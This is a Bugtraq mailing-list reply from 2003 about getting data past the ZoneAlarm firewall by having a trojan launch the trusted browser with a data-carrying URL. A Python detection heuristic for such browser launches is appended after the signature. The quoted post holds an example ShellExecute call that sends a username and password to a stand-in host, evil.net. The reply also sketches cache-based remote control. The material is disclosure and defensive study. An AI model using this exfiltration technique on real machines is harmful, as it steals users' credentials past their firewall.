Date: Thu, 03 Jul 2003 11:57:27 -0700
From: Dan Harkless <bugtraq@...kless.org>
To: bugtraq@...urityfocus.com
Subject: Re: Bypassing ZoneAlarm (limited)
While I was being interviewed for an InfoSecurityMag.com article on this (in
which the author unfortunately got multiple fundamental facts wrong), I
thought of a couple of other points that are probably worth mentioning.

<aceh@...vetch.bg> writes:
> Windows dll shell32.dll exports a well known and documented function called
> ShellExecute. From Win32 Programmer's reference:
> 
> >HINSTANCE ShellExecute(
> >  HWND hwnd,              // handle to parent window
> >  LPCTSTR lpOperation,    // pointer to string that specifies
> >                          // operation to perform
> >  LPCTSTR lpFile,         // pointer to filename or folder name string
> >  LPCTSTR lpParameters,   // pointer to string that specifies
> >                          // executable-file parameters
> >  LPCTSTR lpDirectory,    // pointer to string that specifies default
> >                          // directory
> >  INT nShowCmd            // whether file is shown when opened
> >  );
> 
> When the lpFile parameter is an Internet url, windows invokes Internet 
> Explorer (or more accurately - the default web browser), which in 99% of 
> the cases is allowed to access Internet, with that url. Example:
> 
> ShellExecute(
>   0,
>   "open",
>   "http://evil.net/collect.cgiun=stolen_username&pw=stollen_password",
>   0,
>   0,
>   SW_HIDE //This doesn't work.
>           //I think it is supposed to hide the window but ...
>   );

The level of detail you're going into on ShellExecute() kind of implies the
vulnerability is limited to that one system call, but of course a malicious
executable could directly run iexplore.exe or any other executable that
allows opening arbitrary URLs, and pass those URLs via the commandline or
via other means like DDE.

> The info leaked is limited by the maximum allowed url length, but that 
> could be more than enough for a malicious application to send some 
> username/password/cookie/cc_number info to malicious server.

And the vulnerability wouldn't be limited to simplex communications from
host to server.  The trojan could employ techniques (as simple as reading
Internet Explorer cache files) to establish half-duplex communications,
potentially allowing an attacker to gain remote control over your machine
despite the presence of ZoneAlarm.

Of course if a trojan is able to run arbitrary commands with your user
privileges (especially if you're in the Administrators group, as, for
instance, the initial account created on Windows XP boxes is), there are
other ways an attacker could gain control of your machine.  Particularly if
you're running only ZoneAlarm rather than ZoneAlarm Plus or Pro, since it
doesn't notice DLLs getting changed.

--
Dan Harkless
bugtraq@...kless.org
http://harkless.org/dan/
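The thread's point is that the outbound request never comes from the trojan itself: it comes from the browser, which the firewall already trusts. A host-side detection therefore has to look at who launched the browser and with what URL, rather than at the socket. The following is an added example, not code from the original post or from ZoneAlarm: a small heuristic run over constructed process-creation records (tab-separated key=value lines, a format assumed here for illustration) that flags a browser started by a parent outside an expected allowlist, or started with a URL whose query string is unusually long. Because it watches process creation rather than the ShellExecute() call, it also covers the direct launch of iexplore.exe that Dan mentions; the allowlist, the length threshold and the sample lines are all assumptions.

```python
"""Flag browser launches that look like the firewall-bypass pattern discussed
in the thread: an unexpected parent process starting the default browser with
a URL that carries data in its query string.

The event format (tab-separated Key=Value fields) and all sample records are
constructed for this example; real EDR/Sysmon records differ in layout.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Browser executables we care about (assumed list; extend per environment).
BROWSERS = {"iexplore.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Parents that normally start a browser for an interactive user
# (constructed allowlist; tune to what is actually seen on the fleet).
EXPECTED_PARENTS = {"explorer.exe", "userinit.exe"}
# Query strings longer than this are treated as suspicious (assumed threshold).
MAX_QUERY_LEN = 64

URL_RE = re.compile(r"""https?://[^\s"']+""", re.IGNORECASE)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> Optional[ProcEvent]:
    """Parse one constructed 'Key=Value<TAB>Key=Value' process-creation record."""
    fields = {}
    for chunk in line.split("\t"):
        key, sep, value = chunk.partition("=")
        if sep:
            fields[key] = value
    try:
        return ProcEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])
    except KeyError:
        return None


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def query_length(url: str) -> int:
    """Length of the part after '?', or 0 when the URL has no query string."""
    return len(url.split("?", 1)[1]) if "?" in url else 0


def assess(ev: ProcEvent) -> Optional[str]:
    """Return a reason string when the event matches the heuristic, else None."""
    if basename(ev.image) not in BROWSERS:
        return None
    match = URL_RE.search(ev.command_line)
    if not match:
        return None  # browser started without a URL on its command line
    url = match.group(0)
    parent = basename(ev.parent_image)
    reasons = []
    if parent not in EXPECTED_PARENTS:
        reasons.append(f"browser launched by unexpected parent {parent}")
    qlen = query_length(url)
    if qlen > MAX_QUERY_LEN:
        reasons.append(f"long query string ({qlen} chars)")
    return "; ".join(reasons) or None


def scan(lines: List[str]) -> List[Tuple[ProcEvent, str]]:
    """Run the heuristic over raw records and collect (event, reason) findings."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        reason = assess(ev)
        if reason:
            findings.append((ev, reason))
    return findings


IE = "C:\\Program Files\\Internet Explorer\\iexplore.exe"
# Constructed sample records: a benign launch, a launch by a dropped binary,
# and a benign parent passing an oversized query string.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\explorer.exe\tImage=" + IE
    + '\tCommandLine="' + IE + '" http://example.invalid/news',
    "ParentImage=C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe\tImage=" + IE
    + '\tCommandLine="' + IE + '" http://example.invalid/collect.cgi?u=alice',
    "ParentImage=C:\\Windows\\explorer.exe\tImage=" + IE
    + '\tCommandLine="' + IE + '" http://example.invalid/c?d=' + "A" * 80,
]

if __name__ == "__main__":
    for ev, reason in scan(SAMPLE_EVENTS):
        print(f"{basename(ev.parent_image)} -> {basename(ev.image)}: {reason}")
```

Run on the three sample records the benign launch is silent and the other two are reported. The limitation is the one Dan raises: a trojan that hands a URL to an already-running browser over DDE, or that reads the browser cache to get data back, produces no process-creation event at all, so this heuristic is a complement to application-level controls, not a replacement for them.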

